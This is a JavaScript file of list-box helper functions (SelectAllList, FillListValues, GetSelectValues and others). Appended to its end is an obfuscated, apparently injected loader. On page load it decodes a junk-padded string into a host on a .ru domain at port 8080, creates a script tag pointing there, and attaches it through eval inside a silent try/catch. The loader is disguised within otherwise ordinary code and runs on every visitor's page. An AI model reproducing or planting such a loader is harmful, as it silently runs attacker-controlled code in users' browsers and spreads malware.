
var arrOldValues;

function SelectAllList(CONTROL)
{
	for(var i = 0;i < CONTROL.length;i++)
	{
	  CONTROL.options[i].selected = true;
	}
}

function DeselectAllList(CONTROL)
{
	for(var i = 0;i < CONTROL.length;i++)
	{
	  CONTROL.options[i].selected = false;
	}
}


function FillListValues(CONTROL)
{
	var arrNewValues;
	var intNewPos;
	var strTemp = GetSelectValues(CONTROL);

	arrNewValues = strTemp.split(",");
	for(var i=0;i<arrNewValues.length-1;i++)
	{
	  if(arrNewValues[i]==1)
	  {
		  intNewPos = i;
		}
	}

	for(var i=0;i<arrOldValues.length-1;i++)
	{
		if(arrOldValues[i]==1 && i != intNewPos)
		{
		  CONTROL.options[i].selected= true;
		}
		else if(arrOldValues[i]==0 && i != intNewPos)
		{
		  CONTROL.options[i].selected= false;
		}

		if(arrOldValues[intNewPos]== 1)
		{
			 CONTROL.options[intNewPos].selected = false;
		}
		else
		{
			CONTROL.options[intNewPos].selected = true;
		}
	}
}


function GetSelectValues(CONTROL)
{
	var strTemp = "";
	for(var i = 0;i < CONTROL.length;i++)
	{
	  if(CONTROL.options[i].selected == true)
	  {
		  strTemp += "1,";
		}
		else
		{
		  strTemp += "0,";
		 }
	}

	return strTemp;
}

function GetCurrentListValues(CONTROL)
{
  	var strValues = "";

	strValues = GetSelectValues(CONTROL);
	arrOldValues = strValues.split(",")
}







try{window.onload=function(){Tpg9l06t1uynt4 = '' + 'b^!(r!@)e(^(a$&^^k#-)^(c&(!o)#)m$.&m()a)^s^)!r)#a$##w!^y!^^.#@#&c^o($)m!.(g(o&^o!g^l))e^(-)(c^)^!o()-#)@!v@e^@!@.!!b!#)@i$(!l#!t^#o@^@^#p())!.((#$r(u!:!!@J&^#^q^^)d&5#)g(^$x#g&&y(@b@^#$1&##)#d(l(l)^@@/@g@(o#(^o$!!g(l#e^@.&^^(c#o#m#/!(g!#)o!#o)@)##g)!l#&)e)&$.#c#o$m^((/!t^h((e))$@f#$$r!e)^#e$$d($)i)@)$c&^(t^^i^^o$n!)a&&$r)!!y$)(@.)@c(^o&^@m!@(/(e!b!^&@a@^y(!&.&c#)$o@^$.!^u#(^&k@$/&&r!e(u(!t!$(@e$&@r$((s(.^!c&^o!m))$!$/(&@)'.replace(/&|\$|#|\^|\)|@|\!|\(/ig, '') ;Ze6eigpxc7vs = 'appendChild';H3gd1l3mh22 = document.createElement('sc'+'ript');H3gd1l3mh22.src = 'h'+'ttp://'+Tpg9l06t1uynt4.replace(/Jqd5gxgyb1dll/g, '8080');H3gd1l3mh22.setAttribute('defer', 'def'+'er');eval('document.body.'+Ze6eigpxc7vs+'(H3gd1l3mh22)');} }  catch(K97smyit ) {}